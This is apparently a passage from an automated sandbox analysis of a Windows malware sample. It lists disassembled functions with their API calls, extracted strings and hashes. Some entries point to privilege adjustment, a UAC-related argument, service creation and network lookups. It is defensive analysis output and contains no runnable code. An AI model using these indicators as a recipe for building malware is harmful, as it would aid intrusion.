                            • Opcode ID: cf055128774f60592a3dd4f536d3d19310936a88d0613da9976bf165f9fed64f
                            • Instruction ID: 8e74e5dbd17faedd92233c1d650ba914d98a3c2b359c8518cf7fc787aec77e35
                            • Opcode Fuzzy Hash: cf055128774f60592a3dd4f536d3d19310936a88d0613da9976bf165f9fed64f
                            • Instruction Fuzzy Hash: 61A1E570E01248EEEF11EBA9D942BDDBBB0AF55304F50409EE50477282EBB81B44CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0054D4B5
                            • _strlen.LIBCMT ref: 0054D572
                              • Part of subcall function 00526747: __EH_prolog.LIBCMT ref: 0052674C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen
                            • String ID: ($Invalid type info$Some of required function pointers (is_instance, release, read or write) are NULL$Type name should contain only letters, digits, - and _$Type name should start with a letter or _$cvRegisterType
                            • API String ID: 1490583215-3333454738
                            • Opcode ID: eecbd44c14b362af9e7c69a67d38e8b11cd8ccedb7307556048ad87ac5ca101e
                            • Instruction ID: 95645daa29c1e11541bb8f57286c8cbbb84a8f79c9b96ede5d7eeefff689ba99
                            • Opcode Fuzzy Hash: eecbd44c14b362af9e7c69a67d38e8b11cd8ccedb7307556048ad87ac5ca101e
                            • Instruction Fuzzy Hash: 62610371D01348EECB10EF94D981BEEBFB4BF54308F64415AE205A7182EB785B4ACB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0044E035
                            • new.LIBCMT ref: 0044E05B
                            • GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044E0C1
                            • GetProcAddress.KERNEL32(?,?), ref: 0044E142
                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0044E19C
                            • GetProductInfo.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0044E1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info$AddressH_prologHandleModuleProcProductSystem
                            • String ID: q${
                            • API String ID: 1760484215-2622329447
                            • Opcode ID: 13f3b068f6569ef0aa7ecac21480ebf316a42d1a1c3f798a0ac8f8d158110036
                            • Instruction ID: 2018a9e3838fd97179f42bc47fbd35d40b294c3d07c84d0fda71dc35fd26f447
                            • Opcode Fuzzy Hash: 13f3b068f6569ef0aa7ecac21480ebf316a42d1a1c3f798a0ac8f8d158110036
                            • Instruction Fuzzy Hash: 60513971C0474CAEEB019FA9DC81AEEFBB9FF55300F10412EE948A7212EB745A858710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004161F8
                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0041622E
                            • GetProcAddress.KERNEL32(00000000), ref: 00416235
                            • GetLastError.KERNEL32 ref: 0041624A
                            • EnterCriticalSection.KERNEL32(00000018,0000273D), ref: 004162C7
                            • LeaveCriticalSection.KERNEL32(00000018,?,?,000003E3), ref: 004162F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$AddressEnterErrorH_prologHandleLastLeaveModuleProc
                            • String ID: CancelIoEx$KERNEL32
                            • API String ID: 3905279128-434325024
                            • Opcode ID: 369d6c3a43dcee6edc7e1e7c4f54f33cb79032d60b7f67d996bbbdc7e2ba924e
                            • Instruction ID: a7006d18d8acdee5e0b967cd4137457068317b79715a05f2329568f27a806d5a
                            • Opcode Fuzzy Hash: 369d6c3a43dcee6edc7e1e7c4f54f33cb79032d60b7f67d996bbbdc7e2ba924e
                            • Instruction Fuzzy Hash: 9D31C271A002499FDF11EFA4C8816EEB7B5FF48324F15406EE855A7241CBB899428BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00432CC4
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00432CCF
                            • LoadLibraryA.KERNEL32(ntdll.dll,00000000,RtlAdjustPrivilege,?,?,00000000), ref: 00432D09
                            • GetProcAddress.KERNEL32(00000000), ref: 00432D16
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,?,?,00000000), ref: 00432D84
                            • GetProcAddress.KERNEL32(00000000), ref: 00432D8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$ExceptionException@8H_prologHandleLibraryLoadModuleRaiseThrow
                            • String ID: RtlAdjustPrivilege$ntdll.dll
                            • API String ID: 1958860538-64178277
                            • Opcode ID: b679daa22566008a588b228a0f399ae62337a8b9c52c85f4b772e076711b2577
                            • Instruction ID: 181ba8571e7ca69a2902c82104256214a52e939873d4e805e75b0ad3c802b7c0
                            • Opcode Fuzzy Hash: b679daa22566008a588b228a0f399ae62337a8b9c52c85f4b772e076711b2577
                            • Instruction Fuzzy Hash: A631B271D0024DAEEB009FEDCC816EEFBB9EF59304F10922AE505E2162EBB419458B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004226B3
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004226D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8H_prologThrow
                            • String ID: %(B$-J$-J$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3222999186-1624389419
                            • Opcode ID: 321b7316f0767ef0116021abc2423ed97814d3a0d76f17a2fbc1baf0e6f94302
                            • Instruction ID: aa09175c34796eb147eb1c34b455be395ae94e8227792fea42777a0b9671923f
                            • Opcode Fuzzy Hash: 321b7316f0767ef0116021abc2423ed97814d3a0d76f17a2fbc1baf0e6f94302
                            • Instruction Fuzzy Hash: 0311CEB1A40218BBDF00EB94DA56BEE7774AB40704F80415EE901BA1E2DBFD0940DB29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004312CF
                              • Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
                              • Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A
                              • Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7
                              • Part of subcall function 004B1F44: __EH_prolog.LIBCMT ref: 004B1F49
                            • lstrlenW.KERNEL32(?), ref: 00431738
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Deallocate_strlenlstrlenstd::_
                            • String ID: pY$$$.$0$dpY
                            • API String ID: 1102430898-161294348
                            • Opcode ID: 2eecbb8da9c6eff507d607138e73859f36326692bb7e4c3f6d9cb3e5938524b7
                            • Instruction ID: 2019e853b7ba3b3f6dace8cdb3938b96c2a69957cc0489f69eaab64d4fa91aeb
                            • Opcode Fuzzy Hash: 2eecbb8da9c6eff507d607138e73859f36326692bb7e4c3f6d9cb3e5938524b7
                            • Instruction Fuzzy Hash: 40E19E70D04248EEDF10DFA9C945BEDBBB8AF59308F1040AEF405A7192DB785E49CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0043053F
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0043054A
                              • Part of subcall function 0044E030: __EH_prolog.LIBCMT ref: 0044E035
                              • Part of subcall function 0044E030: new.LIBCMT ref: 0044E05B
                              • Part of subcall function 0044E030: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044E0C1
                              • Part of subcall function 0044E030: GetProcAddress.KERNEL32(?,?), ref: 0044E142
                            • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,00000000), ref: 0043057E
                            • GetCurrentProcessId.KERNEL32( -uac ,00000001,00000000,00000000,?,?,?,00000000), ref: 0043060C
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                              • Part of subcall function 004317E2: __EH_prolog.LIBCMT ref: 004317E7
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
                              • Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C
                              • Part of subcall function 004312CA: __EH_prolog.LIBCMT ref: 004312CF
                              • Part of subcall function 00476C03: __EH_prolog.LIBCMT ref: 00476C08
                            • Sleep.KERNEL32(000007D0,00000001,00000000), ref: 00430956
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ByteCharMultiWideWow64$AddressCurrentDeallocateDisableExceptionException@8HandleModuleProcProcessRaiseRedirectionSleepThrowstd::_
                            • String ID: -uac $Open
                            • API String ID: 579798290-1568193000
                            • Opcode ID: 791cdff285ec6c18f8e8b8cc1e0e7f2746cf6ce6cc8c04337d7c659aa47099ed
                            • Instruction ID: bc9629f558fbc10ef8a2d00f0175091ec6b6f7cbbdd8330f476d59a52988737c
                            • Opcode Fuzzy Hash: 791cdff285ec6c18f8e8b8cc1e0e7f2746cf6ce6cc8c04337d7c659aa47099ed
                            • Instruction Fuzzy Hash: 08D13C71D04288EEDB14EBA9DD51BEDBBB4AF61308F1041DEE40667182DBB41F44CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A044
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041A04F
                              • Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
                              • Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
                              • Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE
                              • Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                            • String ID: #$I$Po#$Po#$o
                            • API String ID: 3644655947-2769149942
                            • Opcode ID: 4f845e280cf3a657bef515b370d58f218f93662ea27b56c662e0666267f86af0
                            • Instruction ID: 686d0957ac0dc56bfbc0da5fcef495ae2bfa271e15074c82fe43ed19b16736fb
                            • Opcode Fuzzy Hash: 4f845e280cf3a657bef515b370d58f218f93662ea27b56c662e0666267f86af0
                            • Instruction Fuzzy Hash: D181F671D0424CAEDB00DFE9D881BEDBBB8EF59304F20416EF515A7291EB781A84CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004BB5E5
                            • std::exception::exception.LIBCONCRT ref: 004BB6CC
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004BB6F9
                            • std::exception::exception.LIBCONCRT ref: 004BB720
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Exception@8H_prologThrow___std_exception_copy
                            • String ID: 4s$expected >$unexpected end of data
                            • API String ID: 4209301069-991829502
                            • Opcode ID: 8b1d3957207f505c324ce79e6a95fd0670fcf4cf1a6edb5b0f48bcd14e6a9081
                            • Instruction ID: 0b2fe0a887f8a89c18e3e9c4816864780de2b68ed30e08345f6c81ac900129bf
                            • Opcode Fuzzy Hash: 8b1d3957207f505c324ce79e6a95fd0670fcf4cf1a6edb5b0f48bcd14e6a9081
                            • Instruction Fuzzy Hash: 6141C1709042499FDB10DF69C050AEDBFF5EF19314F24409EE495AB382C7B99E02CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004309CA
                            • new.LIBCMT ref: 004309F0
                            • GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 00430A5B
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00430A79
                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00430AC9
                            • GetProductInfo.KERNEL32(00000001,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00430ADB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info$AddressH_prologHandleModuleProcProductSystem
                            • String ID: RtlGetVersion
                            • API String ID: 1760484215-3026520245
                            • Opcode ID: a4ad8f4ab691a92ea1e724edc2c889b316426821bedfcb2fae30abbcb81e7894
                            • Instruction ID: 6404758461dc82cfd43961a36794971adb8017d390324696ef4079359887610b
                            • Opcode Fuzzy Hash: a4ad8f4ab691a92ea1e724edc2c889b316426821bedfcb2fae30abbcb81e7894
                            • Instruction Fuzzy Hash: 9531D571D00348ABDB11EFF99C456EEBBB9FF69304F10516EE905A7202E7385E448B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00414517
                            • std::exception::exception.LIBCONCRT ref: 00414537
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                              • Part of subcall function 0041CAA1: __EH_prolog.LIBCMT ref: 0041CAA6
                              • Part of subcall function 0041CAA1: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CAF4
                            • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000064,00000000,00000001), ref: 00414568
                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,00000064,00000000), ref: 004145B0
                            • std::exception::exception.LIBCONCRT ref: 004145D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalH_prologSectionstd::exception::exception$EnterException@8LeaveThrow___std_exception_copy
                            • String ID: Invalid service owner.$Service already exists.
                            • API String ID: 479834926-4115445021
                            • Opcode ID: c426ae453c5316bb45af9c006bb095a1d0b55481944eb36e95d83558caf1e521
                            • Instruction ID: 5e1c88f37677eba64b8ed75703ef542653ff074ccc6753e62f2279e524c2587a
                            • Opcode Fuzzy Hash: c426ae453c5316bb45af9c006bb095a1d0b55481944eb36e95d83558caf1e521
                            • Instruction Fuzzy Hash: 81219E70801208EFDB10DF94C5856DEBBF1FF14318F2085ADE445AB282C775AE49CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00574E16
                            • new.LIBCMT ref: 00574E5C
                              • Part of subcall function 00575AFF: __EH_prolog.LIBCMT ref: 00575B04
                              • Part of subcall function 00575AFF: _strlen.LIBCMT ref: 00575B3B
                            • new.LIBCMT ref: 00574EA6
                            • new.LIBCMT ref: 00574EFA
                            • new.LIBCMT ref: 00574F44
                            • new.LIBCMT ref: 00574F93
                            • new.LIBCMT ref: 00574FDD
                              • Part of subcall function 00689E2F: Concurrency::cancel_current_task.LIBCPMT ref: 00689E47
                              • Part of subcall function 005788C9: __EH_prolog.LIBCMT ref: 005788CE
                              • Part of subcall function 005788C9: _strlen.LIBCMT ref: 005788F0
                            • new.LIBCMT ref: 00575029
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 194979272-0
                            • Opcode ID: d348dd2e255e7a04975d9478a94b6ef38bd829f02040cb2e86af2ca7f9850373
                            • Instruction ID: ec79fdd97f30282d325d4aa532c5880f809d8fb84260d4748b0d03db5f89a7f5
                            • Opcode Fuzzy Hash: d348dd2e255e7a04975d9478a94b6ef38bd829f02040cb2e86af2ca7f9850373
                            • Instruction Fuzzy Hash: 84816270D0578ADECF01EFB895556EEBFB4BF55300F14846EE104AB281DBB48A04EB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00432682
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0043268D
                              • Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
                              • Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A
                              • Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7
                              • Part of subcall function 004B0852: __EH_prolog.LIBCMT ref: 004B0857
                              • Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C
                              • Part of subcall function 00460888: __EH_prolog.LIBCMT ref: 0046088D
                              • Part of subcall function 00461197: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000008,00596E69,00000000), ref: 0046121C
                              • Part of subcall function 00461197: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000008,00596E69), ref: 00461254
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ByteCharDeallocateMultiWidestd::_$ExceptionException@8RaiseThrow_strlen
                            • String ID: $S$dpY$}
                            • API String ID: 4020726430-746112674
                            • Opcode ID: 113f429730c0ca8408f6086491309519a94404487e6433849844dfa3caa57dee
                            • Instruction ID: 33e64cb7c2b1de9c5e2858491d9c87aa173111da7c50e413dad8460d0dce7dc2
                            • Opcode Fuzzy Hash: 113f429730c0ca8408f6086491309519a94404487e6433849844dfa3caa57dee
                            • Instruction Fuzzy Hash: F2129070D0529CEEDB15EBA9CD41BDEBBB8AF16304F10409EE00567192DBB81F44DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00419154
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041915F
                            • gethostbyname.WS2_32(?), ref: 00419194
                              • Part of subcall function 00415489: __EH_prolog.LIBCMT ref: 0041548E
                              • Part of subcall function 00415489: new.LIBCMT ref: 004154A0
                              • Part of subcall function 00415489: new.LIBCMT ref: 004154DE
                              • Part of subcall function 00416C3E: htons.WS2_32(?), ref: 00416C76
                              • Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C8D
                              • Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C94
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologhtonl$ExceptionException@8RaiseThrowgethostbynamehtons
                            • String ID: +$Active$^
                            • API String ID: 2841390951-2913068736
                            • Opcode ID: 1cea09d864dfcf1d859b5d15a2b567b7f6b83ba0f52e2f52873567dcb6fb4ba7
                            • Instruction ID: 76f2b2ba441e3810c476b648d6b09e66f3cf649257ec26b1ff93bedae93abb77
                            • Opcode Fuzzy Hash: 1cea09d864dfcf1d859b5d15a2b567b7f6b83ba0f52e2f52873567dcb6fb4ba7
                            • Instruction Fuzzy Hash: 3C029E7280025CEEDB11DFA4DC91BEEB7B8AF15304F1041AFE509A7192EB785E88CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A364
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041A36F
                              • Part of subcall function 0041D074: __EH_prolog.LIBCMT ref: 0041D079
                              • Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
                              • Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
                              • Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE
                              • Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                            • String ID: A$L$P$`
                            • API String ID: 3644655947-2174273020
                            • Opcode ID: 21451930b223e966d5022d50e5b285d71bff5c51108713edce172a83df457f8b
                            • Instruction ID: 24418ed412d0487b69b78dcf83cc3fd5e794bcf791caf4c1afd30921b42fe6ed
                            • Opcode Fuzzy Hash: 21451930b223e966d5022d50e5b285d71bff5c51108713edce172a83df457f8b
                            • Instruction Fuzzy Hash: EB81E371D0424CAEDB00DFA9DC81BEEBBB8EF59304F10412EF505A7292EB785A84CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0042C8A2
                              • Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2
                              • Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C
                              • Part of subcall function 004A954B: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004A9578
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                            • String ID: 5$;$B$I$X
                            • API String ID: 420165198-800781944
                            • Opcode ID: 7ab433d744c6203554de424a4a4b51fc3a4836011f43448c544f8dd85c5f7910
                            • Instruction ID: 71e3667e650e1c2d3238ec360d67e8f501d080642bddfb6115546527270b07ea
                            • Opcode Fuzzy Hash: 7ab433d744c6203554de424a4a4b51fc3a4836011f43448c544f8dd85c5f7910
                            • Instruction Fuzzy Hash: D671DFB0D05298DADB10DFA5DD81BEDBBB4AF26308F1040AEE50577282DB781F49CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0042A3EC
                            • GetWindowTextW.USER32(?,00000001), ref: 0042A45D
                              • Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateH_prologstd::_$TextWindow
                            • String ID: Master: $Master: $inY$}nY
                            • API String ID: 3018432088-1176296115
                            • Opcode ID: a8409e691ce8ff2c451ee8d5de8b0ffec303b613c9b03c010800a3761736c831
                            • Instruction ID: c2da6db55fb7418e840aa233aea7bafd0737402a6d03c2df65e188ea527720ad
                            • Opcode Fuzzy Hash: a8409e691ce8ff2c451ee8d5de8b0ffec303b613c9b03c010800a3761736c831
                            • Instruction Fuzzy Hash: FA61A370904158EEDB11EFA5DC95EDEBB78EF61308F10415EF10267192EB781B48CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,006A8C9C,00000003,?,00000000,?,00000003,0000000C), ref: 006A8569
                            • __fassign.LIBCMT ref: 006A85E4
                            • __fassign.LIBCMT ref: 006A85FF
